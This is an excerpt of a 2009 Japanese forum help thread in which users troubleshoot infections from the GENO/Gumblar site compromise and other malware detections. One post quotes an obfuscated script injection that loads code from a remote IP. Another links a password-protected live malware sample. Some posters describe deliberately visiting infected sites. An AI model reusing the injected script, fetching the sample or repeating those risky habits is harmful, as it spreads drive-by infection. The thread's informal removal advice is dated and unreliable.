ちなみにもう一台のパソコンも検出数が全く同じ結果がでました。共通の行為としてはInternetAcceleratorSPというフリーソフトをいれたことだけです。
お分かりの方がいましたらどうか教えてください。お願いします。

あと全ての検出が終わった際、Adware memwatcherというものが1つ表示され削除か復元かを選ぶことになりました。
すぐに削除しましたが、これは解決したということなのでしょうか・・
666名無しさん@お腹いっぱい。sage2009/04/05(日) 16:19:58
Adware memwatcher
広告の出るソフト使ってるんじゃないか?
検出名どおり、広告表示のアドウエアだったと思うざます。

トレンドも一応表示してるだけじゃないかな
http://www.trendmicro.co.jp/Vinfo/virusencyclo/default5.asp?VName=ADW%5FMEMWATCHER%2EB&VSect=P
667八頭 ◆YAGApwSaEw sage2009/04/05(日) 16:27:18
>スパイウェアは101個検出されました

ダウンローダも同封されてたのかな?
6686652009/04/05(日) 16:32:31
>>666
もしかしたらそうかもしれません。ただ広告表示はこれまで出たことがないのでどういうものか分かりませんが・・
これから出るのでしょうか?できればあんまり関わりたくないです。

gooスピードテストなBNP スピードテストなど速度検索をするページへのリンクが機能の中にあるのでこれかもしれません。
製作者は安岡喜晴さんと明示してありますが、ホームページにハングルがあるので韓国製と考えたほうがいいかもしれません。
大陸のものはGOM PLAYERなど使っていたのであんまり抵抗がないかったのですが・・

気になっているのは隔離されました、と出るのに隔離ファイルに先ほど削除したものを除いて何も見当たらないことなんです
そういうものであれば別に問題ないのですが・・
ちなみに隔離ファイル名は全てC:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS 127.0.0.1です
669名無しさん@お腹いっぱい。sage2009/04/05(日) 16:35:05
マカの情報。幾分詳しいか。
http://www.mcafee.com/japan/security/virA2003.asp?v=Adware-MemWatcher
6706652009/04/05(日) 16:35:19
>>667
作者サイトにてInternetAcceleratorSPSetup.msiとものを落としました。
速度測定サイトで紹介されていたので安心していましたが、これ自体がスパイウェアだったのでしょうか?
671八頭 ◆YAGApwSaEw sage2009/04/05(日) 16:41:00
恐いのはダウンローダ型が呼び寄せる多重感染だから
PCトラブル質問掲示板 へ相談して指示をもらうのがいいと思う
アメリカでもAdware memwatcherの感染例があった
672名無しさん@お腹いっぱい。sage2009/04/05(日) 16:49:19
アダ被で同質の感染例見つけたけど
バスタがきっちり処理してたらしい

まあ診てもらっても良いかも
673665sage2009/04/05(日) 17:08:45
>>672
アダ被で同質の感染例・・
悪夢です。ちなみにどこでしょうか?
自分でも探していますが、もし差し支えなければどこだか教えて下さい
674名無しさん@お腹いっぱい。sage2009/04/05(日) 17:33:42
いや、質問が似てるってだけで内容は違うよ?
マルチと言ってるわけではないので、その辺は誤解なきよう…

ただバスタがやたら
[マルウエア名称] C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS 127.0.0.1
で検知してると思ったから、同じかなあと思っただけで

さて、晒していいものなのか判らんが・・・・
675674sage2009/04/05(日) 17:34:38
ちなみに感染マルウエアは同じ。
676665sage2009/04/05(日) 17:40:46
>>669
http://www.mcafee.com/japan/security/virA2003.asp?v=Adware-MemWatcher

ここを見たところ
「Adware-MemWatcherはバックグラウンドで起動し、ユーザがInternet Explorerを開くのを待ちます。ユーザがInternet Explorerを開くと、広告を表示するウインドウを1つ以上表示します。 」
とあります。

つまりInternet Explorerを開いて問題なければ大丈夫ということでしょうか?

6776652009/04/05(日) 18:01:10
>>674
すいません。一生懸命探したのですがどこだか分かりませんでした。

内容は記述なさらいで構いません。せめてURLだけでも教えて下さい。
お願いします。
678名無しさん@お腹いっぱい。sage2009/04/05(日) 18:15:01
ttp://www.higaitaisaku.com/kakolog/cbbs.cgi?mode=al2&number=94846&rev=&no=19&KLOG=9
679名無しさん@お腹いっぱい。2009/04/05(日) 20:30:09
これ踏んでしまったのですが大丈夫でしょうか?

【注文0.1】Genoのサイトでウイルス感染…か?★2
http://tsushima.2ch.net/test/read.cgi/news/1238897231/
680名無しさん@お腹いっぱい。sage2009/04/05(日) 20:40:14
ちょ、直貼りやめれ
681名無しさん@お腹いっぱい。sage2009/04/05(日) 20:42:16
t"s"ushima か。。。。
682名無しさん@お腹いっぱい。sage2009/04/05(日) 20:45:58
いや、別に問題ない
ニュー速板のリンク
683 ◆N9P3SuvBPo sage2009/04/05(日) 21:36:19
>679
ざっと読んできたけど、2000とXPに限定されてるとあったからVistaなら大丈夫だとありましたね。

XPだとやられちゃうのか…よし踏んで来るか!!
684 ◆N9P3SuvBPo sage2009/04/05(日) 21:46:55
今、その問題のサイトを表示してるんだけどなんにも起きません。
もしかして訂正された?
685名無しさん@お腹いっぱい。2009/04/05(日) 21:57:52
いや、まだだと思うけど・・・
情報交換は本スレでしたほうが良いかもね。
686名無しさん@お腹いっぱい。sage2009/04/05(日) 22:06:02
>>684
AcrobatとFlash Playerの古いバージョン入れてIEのセキュを中以下にして再トライきぼんw
687 ◆N9P3SuvBPo sage2009/04/05(日) 22:08:16
俺今な、そのgenoのトップやiframeで読み込まれるアンケートページ
問題の数字から始まるアドレスとかを、表示したけどみんなが言ってるようなことは起きませんぞ?

OSはWindowsXPSP2で、WindowsUpdateも購入時の状態からやってないし、
ウイルス対策ソフトも入れてないし、おまけにブラウザはIE6SP2だし、
この環境だと、誰がどう見ても間違い無く、そのページを開いて時点でフリーズして終了ってことですよね?

誰でも良い、仮想PC持ってる人いたら検証してくれ!!
688 ◆N9P3SuvBPo sage2009/04/05(日) 23:46:30
>>686
JavaScriptやActiveX無効にしてたのに、運悪く感染した人もいたそうで…

その人、俺と違って最低限WindowsのUpdateはしっかりとやってるだろうから、
この俺のパソコンよりセキュリティレベルは、比べ物にならないほど上だと思いますよ。
689名無しさん@お腹いっぱい。sage2009/04/06(月) 00:15:56
>>688
再トライきぼんwは戯言だけど…、
他人がどうのではなく、実験機XPのAcrobatとFlash Playerの有無と有の場合のVer、
ブラウザのセキュリティ設定も書きこんだ上で結果を発表しないと…ここはセキュ板だもん。
690名無しさん@お腹いっぱい。2009/04/06(月) 00:16:43
【使用OS】 Windows vista home
【Microsoft Update(MU)の状態】 有り
【使用セキュリティソフトとバージョン】 カスペルスキー7.0
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 されている
【スパイウェア対策ソフト】 スパイボット ADware
【スパイウェア対策ソフトの更新は定期的に行なっているか】 行っている
【ルータの有無】 有り

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】

ただいまスキャン中なのでスキャンの結果ではないのですが、あるHPに行こうとしたら
「脅威を検知しました」が出ました。
警告により拒否はしたのでレポート上では"安全になったオブジェクト"になっています。

検知したものは「trojan-Downloader.JS.Agent.dwf」 URLは t t p : / / 94.247.2.195/jquery.js

経緯としては、研音(芸能事務所)のK-shopというグッズ販売の水嶋ヒロさんのページのところから
菅野美穂さんがキイナで使ったネックレスというjuicyrockのバナーをクリックしたら検知が出ました。
誤検知なのか本当にトロイなのかわからないのですがいかがでしょうか。
http://www.ken-on.co.jp/k-shop/2009/03/post_67.html
K-shopのトップページにも同じバナーはあります。
691名無しさん@お腹いっぱい。sage2009/04/06(月) 00:18:51
上の方で話題になってるGenoだね
692 ◆N9P3SuvBPo sage2009/04/06(月) 00:19:21
>689
Acrobatなし
Flashあり(最新版)
ブラウザIE(セキュリティ高)
アドオン無効
制限付きユーザー
693 ◆N9P3SuvBPo sage2009/04/06(月) 00:25:06
>690
問題になってるgenoウイルスだね。
とりあえずカスペなら対応済みのようなので、念の為スキャンしてみましょう。
694名無しさん@お腹いっぱい。sage2009/04/06(月) 00:34:32
>>690です。レスありがとうございます。
このページで買い物するつもりはないのですが残念な目にあってしまいましたorz
拒否が有効でなにも検出されなければ、他の安全なサイトでのショッピングなどは問題ないでしょうか。
たまに買い物はするので…。あと70%ほどのスキャンが終わったらまた参ります。
695 ◆N9P3SuvBPo sage2009/04/06(月) 00:56:59
>694
WindowsUpdateとAcrobatとFlashが最新版なら大丈夫。
それでも心配ならリカバリするのが最も良い対策と言えるでしょう。
696名無しさん@お腹いっぱい。sage2009/04/06(月) 01:12:33
>>695 JavaスクリプトONにしてアボート、94.247.2.195と通信していたら時既に手遅れ
697名無しさん@お腹いっぱい。sage2009/04/06(月) 01:23:34
>>690です。

>>695
スキャン終わりました。検出なしです。
>>696
すいませんがそこと通信しているかどうか確かめる方法はありますか?
698 ◆N9P3SuvBPo sage2009/04/06(月) 01:24:10
>696
リアルタイムで検知して拒否したので、94.247.2.195とは通信してないと思われます。

94.247.2.195も踏んで来たけど、『Search the Web:』ってもしかしてCoolWebSearchなのか?
699 ◆N9P3SuvBPo sage2009/04/06(月) 01:27:59
>697
検出なし、了解です。

通信なら、スタート→検索欄に「cmd.exe」と入力してEnter
コマンドプロンプトの画面で、「netstat -an」と入力してEnter
94.247.2.195と通信してればアウト
たぶん大丈夫だと思いますが…。
700名無しさん@お腹いっぱい。sage2009/04/06(月) 01:33:26
>>696

690のケースはカスペで検知(遮断)されている前提
701名無しさん@お腹いっぱい。sage2009/04/06(月) 01:44:07
>>690です。アドバイス感謝いたします。
コマンドプロンプトにて「netstat -an」を実行しました。

94.247.2.195との通信履歴はありませんでした。実行すると"アクティブな接続"と表示されますが、
すでになんらかの通信が終わった後だったため(0時36分の出来事だったため)
に通信が表示されなかったということもあり得るのでしょうか。
考えなくてよいのならば、その後の詳細の発表を待ちたいと思います。
702 ◆N9P3SuvBPo sage2009/04/06(月) 01:53:47
>701
じゃあ、今はとりあえず様子見…後日KVRTを使ってチェックしてみるとか。

ちなみに、タスクマネージャにconime.exeがあったらアウトってレスがあると思いますが、
コマンドプロンプトを起動させれば、自動的にconime.exeも起動するようになってますので。
またコマンドプロンプトを閉じても、conime.exeが残るのは使用ですから。
703名無しさん@お腹いっぱい。sage2009/04/06(月) 02:12:59
OSはVistaです。
システムのプロパティを開いて、詳細設定タブを開き、パフォーマンスの設定を開き、
パフォーマンスオプションのデータ実行防止タブを開くと、選択するウィンドウが出ます。
『次に選択するのものを除く〜…有効にする』を選択すると、アンインストールしたソフトの項目がありました。
これを何回削除しても、復活しちゃうんです。。ちなみにDVDFabというソフトです。。
ソフトに関係するレジストリも削除済みです。
何か、ウィルスやその他の脅威の可能性はありますでしょうか?
704名無しさん@お腹いっぱい。sage2009/04/06(月) 06:30:51
951 名前:名無しさん[sage] 投稿日:2009/04/06(月) 01:34:39 0
OSはVistaです。
システムのプロパティを開いて、詳細設定タブを開き、パフォーマンスの設定を開き、
パフォーマンスオプションのデータ実行防止タブを開くと、選択するウィンドウが出ます。
『次に選択するのものを除く〜?有効にする』を選択すると、アンインストールしたソフトの項目がありました。
これを何回削除しても、復活しちゃうんです。。ちなみにDVDFabというソフトです。。
関係するレジストリも削除済みです。
この項目が出ないようにする方法知ってる方いたら、教えて下さい。
何回やっても出てきて気持ち悪くて。。
705名無しさん@お腹いっぱい。2009/04/06(月) 21:07:46
Vista 一般ユーザー(管理者権限は持ってない)
IE7 保護モード

これでだいたいの奴は踏んでも怖くない
706名無しさん@お腹いっぱい。sage2009/04/06(月) 21:44:04
Windows Updateとウィルス定義を最新にしとけば大丈夫なんじゃないの?

「ウイルス対策ソフトのパターンファイルが最新であったにもかかわらず,
職員のWeb閲覧でPE_MUMAWOW.AJ-Oに感染,システムが
利用不能に。Windows Update+ウイルス対策ソフトでは対策にならない例。」

どうして対策できなかったの?
707名無しさん@お腹いっぱい。2009/04/06(月) 23:50:31
>>706

>Windows Update

Windows の脆弱性をつく攻撃ではなかった
もしくは
ゼロデイ攻撃が行われており、まだパッチがなかった

>ウイルス対策ソフト

ウイルス対策ソフトがまだ対応していないウイルスだった

708名無しさん@お腹いっぱい。sage2009/04/07(火) 00:33:08
教えてください。

avastをインスコ バージョン4.8.1335.0
手動でUPDATEして
VPSの現在のバージョン 090406-0、04/06
この状態でスキャン完了。50分くらいかかったが何も検出されず

これで一応は GENOウィルス大丈夫ってことで良いのでしょうか????????

【使用OS】 「windows xp sp3」
【Microsoft Update(MU)の状態】 「不明」 ←試みたが繋がらなかった
【使用セキュリティソフトとバージョン】 「zone alarm」 「avast」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「したつもり」
【スパイウェア対策ソフト】 「無し」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「無し」
【ルータの有無】 「あり」
【スキャンの結果】 「何も検出されず」」

これからMicrosoft Update試みてみます。


709名無しさん@お腹いっぱい。sage2009/04/07(火) 00:45:37
0-day攻撃でやられた、もしくはパッチ未適用でやられた場合でも大丈夫なように、
Vista+IE7で、保護モード使ってるな
710 ◆N9P3SuvBPo sage2009/04/07(火) 00:50:26
>708
GENOウイルス関連サイト踏んだの?
geno-webに飛ばす短縮URLを間違えてクリックしてしまったとか?
711名無しさん@お腹いっぱい。sage2009/04/07(火) 01:02:03
>>710
はい、SDカード欲しくて、色んなサイト物色してたもんで
思いっきりGENO本体見てましたorz....
何時見たのかが記憶にないので
色々不安になってしまいまして

検出されなけれ大丈夫ですよねぇ??
712名無しさん@お腹いっぱい。sage2009/04/07(火) 01:04:33
ひとつ気になるのはこれを踏んだあとか前かはわからんがアマゾンでクレカ決済しているんだよなあ・・・
httpsって飾りですかね。
713 ◆N9P3SuvBPo sage2009/04/07(火) 01:11:10
>711
そういう時は履歴を見れば良いんですよ。
該当するサイト名を右クリック→プロパティ
最終表示日時を見れば、いつ踏んだか分かりますので。

いや、あなた質問する時にこう言いましたよね?
>【Microsoft Update(MU)の状態】 「不明」 ←試みたが繋がらなかった
って
何度試しても時間を置いて試してもそれでも繋がらない、となると可能性はあります。

MicrosoftUpdateできました?
714名無しさん@お腹いっぱい。sage2009/04/07(火) 01:24:14
>>713
firefoxで見てたんですが
なんか調子悪いんで真っ先にアンインストールしてしまってて・・・・
履歴って残ってるもんなんでしょうか???

マジMicrosoft Updateが繋がりませんしたorz
なんかもう疲れたんでorz
当該PCは電源落として明日また挑戦してみます

715名無しさん@お腹いっぱい。sage2009/04/07(火) 01:27:51
>>714
UpdateはIEでやるべきじゃね?
716 ◆N9P3SuvBPo sage2009/04/07(火) 01:29:39
>714
俺Firefox使ってないから断定はできないけど、消えちゃうんじゃないでしょうか…。

電源落す前に、HijackThisのログをどこかのうpろだへ“パス付きで”上げて貰えないでしょうか?
717八頭 ◆YAGApwSaEw sage2009/04/07(火) 01:54:45
>>708と◆N9P3SuvBPo
・Winコントロールパネル>管理ツール>サービス
>「Avast関連のサービス」と「Automatic Updates」がちゃんと動いてるかを確認(駆除後も確認必要)
・Winコントロールパネル>セキュリティセンターの「自動更新」も確認(駆除後も確認必要)

Genoのウイルスはコレ
ttp://www.virustotal.com/analisis/48cfd289b06a1fb46dfbcb9fc8bad17a
File 8lv.exe received on 04.03.2009 18:36:21 (CET)
Avast ・・・ Win32:Daonol-L

「a-squared Free 4.0」 をダウンロード
ttp://www.emsisoft.jp/jp/software/free/
>手動Updateする
>「ディープスキャン」を選択実行して検出を試みる、
(※スキャン終了後に「ログ保存」にボタンをクリックして都合のいい場所にテキスト保存、
あとでAvastへ提出しておく)>a-squared Freeでそのまま駆除
718八頭 ◆YAGApwSaEw sage2009/04/07(火) 02:05:51
複数仕掛けられてた模様・・・
このサイト踏みたくなかったんで、Symantecへは別件提出しといたから対応してくれたんだろう

GENOなどのサイトでウイルス感染★6
GmL.exe 受理 2009.04.06 18:04:43 (CET)
ttp://www.virustotal.com/jp/analisis/d2ab3fb2e35d6cc5aaae32e7230a4646
La.zip 受理 2009.04.06 18:32:46 (CET)
ttp://www.virustotal.com/jp/analisis/3dda094319cd06b1fc0175bdaf516e44
パックされたDropper型、McAfeeやSymantecは対応済みらしい
719 ◆N9P3SuvBPo sage2009/04/07(火) 02:15:15
>717
俺、Avast入れてないし、自動更新だって無効に設定してますけど?

電源落すって言ってたけど、環境によってはブルスクになるってあったからな…
720八頭 ◆YAGApwSaEw sage2009/04/07(火) 02:22:59
KillAVだからね・・・(セキュリティソフトやMicrosoft Updateを停める)

a-squaredよりもこっちのほうが良かったかな?
マカフィー・インターネットセキュリティ 2009体験版
ttps://www.storemcafee.jp/mcfs/catalog/campaign_products.php?campaign_id=55&osCsid=iffvt7a7r0h2le5115blm0ctsdtvm8j6
Avastと一時的な共存なら問題無いから(駆除後にマカフィーアンインストール)体験版使う方がいいかもね

検出箇所と検出名は◆N9P3SuvBPoに教えてあげてねw
721名無しさん@お腹いっぱい。sage2009/04/07(火) 02:30:47
>>720
すんません詳しくありがとうございまする
色々慣れないもので・・・・

流れとしては
PCが重くなる→AVG(前から入ってたが自動UPDATE不能に)→たまたまGENOウイルスの存在を知る
怖くなってAVG削除→avastは対応してる?らしいのでインスコ→これも自動UPDATEできず・・・→手動で>>708の状態まで辿り着く
あれ?Microsoft Updateできないや・・・・・→また不安にorz

明日マカフィー入れてスキャンしてみます。
ありがとうございました。
722 ◆N9P3SuvBPo sage2009/04/07(火) 02:39:24
>721
自動更新やBITSが有効でもね、書き換えられていたらENDだよ。
HijackThisすらもDLできないのか…となると残る選択肢はリカバリしか…
723名無しさん@お腹いっぱい。sage2009/04/07(火) 03:51:53
>>721
自動UPDATEできないのならアウトだと思う
724名無しさん@お腹いっぱい。sage2009/04/07(火) 14:08:00
【使用OS】 「windows xp sp3」
【使用セキュリティソフトとバージョン】 「ノートン2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「年明けで期限切れ」

スキャンで反応が無かったので開こうと思ったらexe・・・
exeのあるフォルダにexeと同じ名前のフォルダを作ってましたが、
他にどんな動作をしているものなのでしょうか?

*ウイルス注意*

http://www1.axfc.net/uploader/H/so/74041 pass[2ch]
725名無しさん@お腹いっぱい。sage2009/04/07(火) 15:08:25
>>724
おもいっきりクロだった。あとは自分で調べれ
File: exe.exe
Status:
INFECTED/MALWARE
MD5: 6da1bd47cfcdb0de1804ba3d193bdee1
Packers detected:
-
↓各スキャナの結果。未検出だったとこは割愛
Scan taken on 07 Apr 2009 05:45:28 (GMT)
AntiVir
Found  TR/Dropper.Gen
Avast
Found  Win32:SdBot-gen44
CPsecure
Found  Troj.Exploit.W32.IMG-WMF.da
Ikarus
Found Virus.Win32.SdBot.gen44
Sophos Antivirus
Found Mal/Behav-043
よくわからんけど他の不正プログラムを落とすマルウェアみたい
726名無しさん@お腹いっぱい。sage2009/04/07(火) 22:18:45
【使用OS】 「Windows 2000」
【Microsoft Update(MU)の状態】 「SP4適用のみ」
【使用セキュリティソフトとバージョン】 「Avira」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「a-squared Free 4.0」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「あり」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Aviraとa-squared Free 4.0でスキャンしたが何も検出されない」

GENOのサイトへアクセスしたとき、いつもよりページが開くのが遅く、重かったので直ぐに他のページを
開きました。時間を空けてGENOに再びアクセスしたところ、よく覚えていないのですがメッセージの画面が
出て内容も全部読まずに「はい」をクリックしました。
アドビ関係は偶然にも3月の17日に最新版をダウンロードしてインストールしています。
いろんなページに書き込まれていて怖くなりどうすればいいのかわかりません。
727726sage2009/04/07(火) 22:32:25
ブラウザはファイアフォックスで再起動してみましたが、何ともありませんでした。
728名無しさん@お腹いっぱい。2009/04/07(火) 22:55:00
【使用OS】 「windows xp sp3」
【使用セキュリティソフトとバージョン】「AVG」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
AVGでは何も検出され
F-Secureでオンラインスキャナしたら
W32/Packed_RPack.Fってのが検出されたんだけど
ググッても情報が何も出てこないんですけど
どなたか情報をください。
729 ◆N9P3SuvBPo sage2009/04/07(火) 22:58:24
>727
最新版のadobe製品を適用済みとのことなので、そこは大丈夫だと思います。
しかし、メッセージに対して「はい」をクリックしたのは少しひっかかりますけど…
730 ◆N9P3SuvBPo sage2009/04/07(火) 23:03:49
>728
たしかに情報ありませんね。
名前削ったりしてもヒットせず。
検出場所分かります?
あと、もしかしてGENOを踏んでしまったとか?
731名無しさん@お腹いっぱい。sage2009/04/07(火) 23:08:07
>>729
ありがとうございます
メッセージは日本語でバックがグレーでした
飛ばし読みですが意味は新しいバージョンがどうのこうのとかいう内容だった
ような気がします。
プロセスエクスプローラなどでも確認しましたが、怪しいものはありませんでした。
ブラウザでアクセスしたときに左下のURLを確認していましたが、見慣れない
アドレスが出ていましたが、飛ばされることはありませんでした。

このまま様子見で大丈夫でしょうか
732名無しさん@お腹いっぱい。2009/04/07(火) 23:11:36
>730
http://lapcie.com/index.php?page=AsukaTime
ここのサイトのAsukaTime

Ver 1.0.28 Download
ってやつのexeから検出されたんですけど
わかりますかね?
733名無しさん@お腹いっぱい。sage2009/04/07(火) 23:17:34
【使用OS】 「Windows XP Pro」
【Microsoft Update(MU)の状態】 「自動 下記が未インストール」
Windows Genuine Advantage (正規 Windows 推奨プログラム) 通知ツール (KB905474)
Microsoft .NET Framework 3.5 Service Pack 1 および .NET Framework 3.5 ファミリ更新プログラム (KB951847) x86

【使用セキュリティソフトとバージョン】 「ウィルスバスター 2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
プログラムのバージョン 16.10.1207
検索エンジンのバージョン 8.911.1001a
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「同上」
【ルータの有無】 「BBルータ有り」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「TROJ_GENOME.BK popup[1].js」

geno騒ぎを聞いたのでチェックしたところ上記がでてきました。

ちなみにIEの履歴には 94.***.***.*** は無し
下記のアクセス履歴が残ってました。
 ttp://www.geno-web.jp/Goods/GB09001900
 最終表示日時 2009/03/31

ウイルスに感染していますか? acrobatreadは8.1.2なので古いです。
734733 sage2009/04/07(火) 23:21:17
パターンファイル部書き忘れました
よろしくお願いします。

【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
プログラムのバージョン 16.10.1207
検索エンジンのバージョン 8.911.1001
パターンファイル番号 5.949.00
735 ◆N9P3SuvBPo sage2009/04/07(火) 23:23:53
>731
>日本語でグレー
>新しいバージョン
これってもしや、AcrobatもしくはFlashのアップデート通知?
でもAdobe製品が最新ならそんなメッセージが出ないのが普通なんですが…

念の為、HijackThisというツールを落してきて、ログを取って、適当なアップローダーに、
“パス付きで”アップしてれませんか。
HijackThisのダウンロード

ttp://wiki.higaitaisaku.com/wiki.cgi?page=HijackThis+%A5%C0%A5%A6%A5%F3%A5%ED%A1%BC%A5%C9+%28+Trend+Micro+%29

>732
AsukaTime.exeか…
いちおうそのファイルを、VirusTotalでスキャンして、
結果のURLを貼ってくれませんか。
736 ◆N9P3SuvBPo sage2009/04/07(火) 23:29:15
>733
先に聞きますが、SP2かSP3は当ててますよね?

>最終表示日時 2009/03/31
GENOが問題のサイトになってると報告されたのが、4月4日らしいので、
その日以前にアクセスしたということだったら、たぶん大丈夫でしょう。
IEのキャッシュのクリアとクッキーのクリアを行なってください。
737733 sage2009/04/07(火) 23:31:22
>>736
WinXP Pro SP3です
キャッシュのクリアとクッキーのクリアを行います。
念のため、いくつかのオンラインウィルススキャンをやってみます。
ありがとうございました。
738名無しさん@お腹いっぱい。2009/04/07(火) 23:31:55
>735
検索してみました〜これでおkですかね?
http://www.virustotal.com/jp/analisis/66fdd1049d0606e8a08c277e48b77ca1
739 ◆N9P3SuvBPo sage2009/04/07(火) 23:39:52
>737
了解です。

>738
うはwwwwwwwwウイルス名から推測するにかなり厄介なタイプと見た。
有名な所もふくめていくつかのベンダーも検知してるので、誤検出の可能性は低いと見た。
素性が全くわからない相手なので(もし分かってたとしても駆除は難しいと思う)、
リカバリをお奨めします。
740名無しさん@お腹いっぱい。2009/04/07(火) 23:43:14
>739
わかりました〜
ありがとうございました〜
741733 sage2009/04/07(火) 23:49:33
>>736
便利そうなものなので こちら(popup.js)もアップしました。
どうも誤検知っぽいですね。

http://www.virustotal.com/jp/analisis/43eb74ec2421691d1e80b9ed4d3cefdb
742 ◆N9P3SuvBPo sage2009/04/07(火) 23:53:51
>741
はい、こちらは誤検出です。
トレンドが「誤検出だ」と訂正してました。
743名無しさん@お腹いっぱい。sage2009/04/07(火) 23:55:58
>>741
パターンファイルは最新っぽいから
訂正し切れなかったものかと思われます。
744名無しさん@お腹いっぱい。2009/04/08(水) 00:10:16
test
745 ◆N9P3SuvBPo sage2009/04/08(水) 00:14:42
あと1時間起きていられるか分かりません…
746名無しさん@お腹いっぱい。sage2009/04/08(水) 00:24:44
>>732
AsukaTime.exe 動かしたが何も落ちてこない。ツマンネ
Bit の Peed.Gen の説明見たが、該当箇所のレジストリも改変されてないし、
ファイルのコピーもできてない。モットツマンネ
ttp://www.threatexpert.com/report.aspx?md5=c534ea1d81c337959b39524c0d883c46
747名無しさん@お腹いっぱい。sage2009/04/08(水) 00:26:24
>>739
ttp://www.virustotal.com/jp/analisis/7d246f0103dc3111c70dc17bc9bf5322
アンパックしたら減った。パッカで検出してんじゃね?
748 ◆N9P3SuvBPo sage2009/04/08(水) 00:36:56
>747
そうだろうか?
もし、>>738の結果が誤検出なら多過ぎだと思うんですがね…
749名無しさん@お腹いっぱい。sage2009/04/08(水) 00:56:24
>>738 >>747 の差分

パッカー(6)とヒューリスティック(4)と Peed.Gen(2)
Peed.Genは改変、ドロップなし報告あり。

AhnLab-V3 5.0.0.2 2009.04.07  Win32/MalPackedB.suspicious
Authentium 5.1.2.4 2009.04.07  W32/Heuristic-210!Eldorado
BitDefender 7.2   2009.04.07  Trojan.Peed.Gen
F-Prot   4.4.4.56  2009.04.07  W32/Heuristic-210!Eldorado
GData   19    2009.04.07  Trojan.Peed.Gen
Norman   6.00.06  2009.04.07  W32/Packed_RLPack.F
Panda   10.0.0.14 2009.04.06  Malicious Packer
Prevx1   V2    2009.04.07  High Risk Cloaked Malware
Sophos   4.40.0  2009.04.07  Sus/ComPack-F
Sunbelt   3.2.1858.2 2009.04.06  Trojan.Win32.Packer.RLPack1.18.a (v)
Symantec 1.4.4.12 2009.04.07  Suspicious.MH690.A
VirusBuster 4.6.5.0  2009.04.06  Packed/RLPack

まぁ、心配なら使わないことだな。
750 ◆N9P3SuvBPo sage2009/04/08(水) 01:04:55
今日のところはこれで失礼させてもらいますね。
751名無しさん@お腹いっぱい。sage2009/04/08(水) 02:16:50
>>746
>>747
>>748
>>749
ご丁寧にいろいろとありがとうございました。
パッカで検出をしていました
お手数おかけしてすいませんでした〜
752名無しさん@お腹いっぱい。sage2009/04/08(水) 02:45:10
778 名前: アブラチャン(アラバマ州)[sage] 投稿日:2009/04/08(水) 01:20:59.53 ID:cD+rmH6W
ここもか?

www.naxos.co.jp/_ScriptLibrary/pm.js
最下部
<!--
document.write(unescape('%3CspBscjBrjBispBppHtjB%20srCXHcjB%3DspB%2FpH%2FjB94%2Eze6243y7%2E23y%2E195%2F3yjqze6uerspByCXH%2Ejsze6%3E%3C%2F3ysc3yript3y%3E').replace(/3y|CW|jB|pH|CXH|ze6|spB/g,""));
-->
     ↓
<script src=//94.247.2.195/jquery.js></script>
753名無しさん@お腹いっぱい。sage2009/04/08(水) 02:51:53
【使用OS】 「XP」
【使用セキュリティソフトとバージョン】 「avast!4.8」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「検出されませんでした」

タスクバーを見たところ、「wpsupdate.exe」とあり、
最大化してみるとはいといいえのボタンだけで、いいえを押すと消えました
再起動して、タスクバーをみるとやはりありました

当然知らなくて検索してみるとどうやらスパイウェアらしいのです。
怖くなってspybotでスキャンしてみても検出されませんでした
どうすれば良いのでしょうか?
754名無しさん@お腹いっぱい。sage2009/04/08(水) 09:05:52
ウィルスドロッパーか
初めてお目にかかった サンキュー
755名無しさん@お腹いっぱい。sage2009/04/08(水) 10:29:36
>>725
ありがとうございます。
久しぶりにクリーンすっかな・・・
756名無しさん@お腹いっぱい。sage2009/04/08(水) 13:03:51
>>735
Adobe Reader 9 のバージョンは 9.0.0.332 でした。
ログは
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:25:24, on 2009/04/08
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Boot mode: Normal

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\Explorer.EXE
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\soft\HiJackThis.exe
757756sage2009/04/08(水) 13:05:30
>>735
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_04\bin\ssv.dll
O3 - Toolbar: ラジオ(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe" /min
